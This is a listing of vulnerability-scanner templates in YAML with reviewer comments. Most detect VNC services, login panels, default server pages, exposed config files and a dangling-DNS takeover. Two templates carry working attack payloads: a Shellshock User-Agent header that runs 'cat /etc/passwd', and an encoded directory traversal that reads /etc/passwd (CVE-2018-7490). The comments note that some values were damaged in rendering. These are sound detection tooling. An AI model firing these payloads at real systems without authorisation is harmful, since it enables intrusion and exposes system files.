--------------------------------------------------------------------------------
/network/vnc-detect.yaml:
--------------------------------------------------------------------------------
# Network detection: a bare CRLF is sent to TCP/5900 and the banner must contain "RFB";
# the extractor records the protocol version that follows "RFB ".
# NOTE(review): id ("vnc-service-detection") differs from the file name ("vnc-detect").
id: vnc-service-detection
info:
  name: VNC Service Detection
  author: pussycat0x
  severity: info
  tags: network,vnc
  description: VNC service detection
network:
  - inputs:
      - data: "\r\n"
    host:
      - "{{Hostname}}:5900"
    matchers:
      - type: word
        words:
          - "RFB"
    extractors:
      - type: regex
        part: body
        regex:
          - "RFB ([0-9.]+)"

--------------------------------------------------------------------------------
/takeovers/tictail-takeover.yaml:
--------------------------------------------------------------------------------
# Dangling-DNS check for Tictail. No `condition` on the word matcher, so either
# string matches; the extractor captures the redirect target shown on the page.
# NOTE(review): this listing shows a line break inside the second word and inside the
# regex, most likely an HTML tag stripped on rendering. The values below are the
# folded remainder; confirm both against the upstream file before relying on them.
id: tictail-takeover

info:
  name: tictail takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 'Building a brand of your own?'
          - 'to target URL: '

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'target="besite">(.*)'

--------------------------------------------------------------------------------
/technologies/default-fedora-page.yaml:
--------------------------------------------------------------------------------
# Default-page detection: root body contains the Fedora HTTP server test-page title.
# No status matcher is applied.
id: default-fedora-page

info:
  name: Fedora Default Test Page
  author: dhiyaneshDk
  severity: info
  tags: tech,fedora
  reference: https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+HTTP+Server+on+Fedora%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - 'Test Page for the HTTP Server on Fedora'
        part: body

--------------------------------------------------------------------------------
/technologies/default-payara-server-page.yaml:
--------------------------------------------------------------------------------
# Default-page detection: root body contains "Payara Server - Server Running".
# No status matcher is applied.
id: default-payara-server-page

info:
  name: Payara Server Default Page
  author: dhiyaneshDk
  severity: info
  tags: tech,payara
  reference: https://www.shodan.io/search?query=http.title%3A%22Payara+Server+-+Server+Running%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - "Payara Server - Server Running"
        part: body

--------------------------------------------------------------------------------
/technologies/gespage-detect.yaml:
--------------------------------------------------------------------------------
# Technology detection: the Gespage login page (French UI string) with HTTP 200.
id: gespage-detect

info:
  name: Gespage Detect
  author: pikpikcu
  severity: info
  tags: tech,gespage

requests:
  - method: GET
    path:
      - "{{BaseURL}}/gespage/webapp/login.xhtml"

    matchers-condition: and
    matchers:

      - type: word
        part: body
        words:
          - "Login utilisateur Gespage"

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/technologies/strapi-cms-detect.yaml:
--------------------------------------------------------------------------------
# Technology detection: the Strapi admin login page body contains 'Strapi Admin'.
# `condition: or` on a single word is redundant but harmless. No status matcher.
id: strapi-cms-detect

info:
  name: strapi CMS detect
  author: cyllective
  severity: info
  description: Detects strapi CMS
  tags: tech,strapi,cms
  reference:
    - https://github.com/strapi/strapi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/admin/auth/login"

    matchers:
      - type: word
        part: body
        condition: or
        words:
          - 'Strapi Admin'

--------------------------------------------------------------------------------
/exposed-panels/acunetix-panel.yaml:
--------------------------------------------------------------------------------
# Panel detection for Acunetix.
# NOTE(review): "#/login" is a URL fragment; fragments are not sent to the server, so the
# request that actually goes out is for "/". The second word is empty in this listing
# (probably a stripped HTML tag); an empty word matches any body, so confirm the
# upstream value. The id ("acunetix-panel-detect") also differs from the file name.
id: acunetix-panel-detect

info:
  name: Acunetix Panel detector
  author: joanbono
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/#/login"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Acunetix'
          - ''
        part: body
      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/exposed-panels/gitlab-detect.yaml:
--------------------------------------------------------------------------------
# Panel detection: /users/sign_in, following up to 2 redirects, with HTTP 200.
# No `condition` on the words, so either 'GitLab' or the about.gitlab.com link suffices.
id: gitlab-detect

info:
  name: Detect Gitlab
  author: ehsahil
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/users/sign_in"

    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'GitLab'
          - 'https://about.gitlab.com'

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/exposed-panels/r-webserver-login.yaml:
--------------------------------------------------------------------------------
# Panel detection: root page containing "R WebServer" with HTTP 200.
id: r-webserver-login
info:
  name: R WebServer Login
  author: pussycat0x
  severity: info
  reference: https://www.exploit-db.com/ghdb/7132
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "R WebServer"

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/exposed-panels/siteomat-login.yaml:
--------------------------------------------------------------------------------
# Panel detection: /login.htm containing 'SiteOmat Login' with HTTP 200.
# NOTE(review): id ("siteomat-loader") differs from the file name ("siteomat-login").
id: siteomat-loader

info:
  name: Orpak SiteOmat login portals
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6624
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login.htm'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'SiteOmat Login'
      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/exposed-panels/web-local-craft.yaml:
--------------------------------------------------------------------------------
# Panel detection: /home.html containing 'WEB Local Craft Terminal' with HTTP 200.
# NOTE(review): id ("weblocal-craft-login") differs from the file name ("web-local-craft").
id: weblocal-craft-login

info:
  name: Web local craft Terminal Login
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/6800
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/home.html'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'WEB Local Craft Terminal'
      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/exposed-panels/whm-login-detect.yaml:
--------------------------------------------------------------------------------
# Panel detection: root page containing "WHM Login" with HTTP 200.
id: whm-login-detect
info:
  name: WHM Login Detect
  author: pussycat0x
  severity: info
  reference: https://www.exploit-db.com/ghdb/7128
  tags: whm,panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "WHM Login"

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/exposed-panels/xvr-login.yaml:
--------------------------------------------------------------------------------
# Panel detection: /login.rsp containing 'XVR LOGIN' with HTTP 200.
id: xvr-login

info:
  name: XVR LOGIN
  author: dhiyaneshDK
  severity: info
  reference: https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22
  tags: panel,xvr

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login.rsp'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'XVR LOGIN'

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/exposures/configs/httpd-config.yaml:
--------------------------------------------------------------------------------
# Exposure check: a readable /httpd.conf (HTTP 200) containing both "LoadModule" and a
# commented-out "# LoadModule" line. Note the second word already contains the first,
# so the `and` effectively requires only the commented form.
id: httpd-config

info:
  name: Httpd Config file disclosure
  author: sheikhrishad
  severity: info
  tags: config,exposure,httpd

requests:
  - method: GET
    path:
      - "{{BaseURL}}/httpd.conf"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "LoadModule"
          - "# LoadModule"
        condition: and

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/exposures/configs/samba-config.yaml:
--------------------------------------------------------------------------------
# Exposure check: a readable /smb.conf (HTTP 200) containing both "configuration file"
# and "samba". A hit discloses share layout and possibly auth settings; keep the file
# out of the web root.
# NOTE(review): "samba" is matched as written (lower-case); presumably the word matcher
# is case-sensitive here — confirm, since a capitalised "Samba" header would not match.
id: samba-config

info:
  name: Samba config file disclosure
  author: sheikhrishad
  severity: info
  tags: config,exposure,smb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/smb.conf"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "configuration file"
          - "samba"
        condition: and

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/technologies/centreon-detect.yaml:
--------------------------------------------------------------------------------
# Technology detection: the Centreon index page title with HTTP 200.
id: centreon-detect

info:
  name: Centreon Detect
  author: pikpikcu
  severity: info
  tags: tech,centreon

requests:
  - method: GET
    path:
      - "{{BaseURL}}/centreon/index.php"

    matchers-condition: and
    matchers:

      - type: word
        part: body
        words:
          - "Centreon - IT & Network Monitoring"

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------
/technologies/default-apache2-ubuntu-page.yaml:
--------------------------------------------------------------------------------
# Default-page detection: root body contains the Apache2 Ubuntu "It works" title.
# No status matcher is applied.
id: default-apache2-ubuntu-page

info:
  name: Apache2 Ubuntu Default Page
  author: dhiyaneshDk
  severity: info
  tags: tech,apache
  reference: https://www.shodan.io/search?query=http.title%3A%22Apache2+Ubuntu+Default+Page%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - "Apache2 Ubuntu Default Page: It works"
        part: body

--------------------------------------------------------------------------------
/vulnerabilities/other/rce-shellshock-user-agent.yaml:
--------------------------------------------------------------------------------
# Shellshock-style check: a crafted User-Agent header is sent to a single fixed CGI
# path and the response body is matched against the root passwd-entry pattern.
# A hit means the CGI handler passed the header to a vulnerable shell; remediation is
# patching bash and auditing other CGI endpoints, since only /cgi-bin/status is probed.
# NOTE(review): info carries no reference or CVE id for this issue; add one. The id
# ("rce-user-agent-shell-shock") also differs from the file name.
id: rce-user-agent-shell-shock

info:
  name: Remote Code Execution Via (User-Agent)
  author: 0xelkomy
  severity: high
  tags: shellshock,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/status"

    headers:
      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
        part: body
--------------------------------------------------------------------------------
/cves/2018/CVE-2018-7490.yaml:
--------------------------------------------------------------------------------
# Directory-traversal check (uWSGI PHP plugin): an encoded ../ sequence targets
# /etc/passwd and the body must match the root entry pattern with HTTP 200.
# Both matchers are required (matchers-condition: and), which keeps false positives
# from error pages that merely echo the path.
# NOTE(review): info has no reference link; adding the advisory would help triage.
id: CVE-2018-7490

info:
  name: uWSGI PHP Plugin Directory Traversal
  author: madrobot
  severity: high
  tags: cve,cve2018,uwsgi,php,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

--------------------------------------------------------------------------------
/exposed-panels/faraday-login.yaml:
--------------------------------------------------------------------------------
# Panel detection for Faraday: body contains the 'ng-app="faradayApp">' attribute
# with HTTP 200.
# NOTE(review): "#/login" is a URL fragment and is not transmitted to the server, so the
# request effectively fetches "/"; the path is kept as the author wrote it.
id: faraday-login

info:
  name: Faraday Login
  author: dhiyaneshDK
  severity: info
  reference: https://www.shodan.io/search?query=html%3A%22faradayApp%22
  tags: panel,faraday

requests:
  - method: GET
    path:
      - '{{BaseURL}}/#/login'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'ng-app="faradayApp">'

      - type: status
        status:
          - 200

--------------------------------------------------------------------------------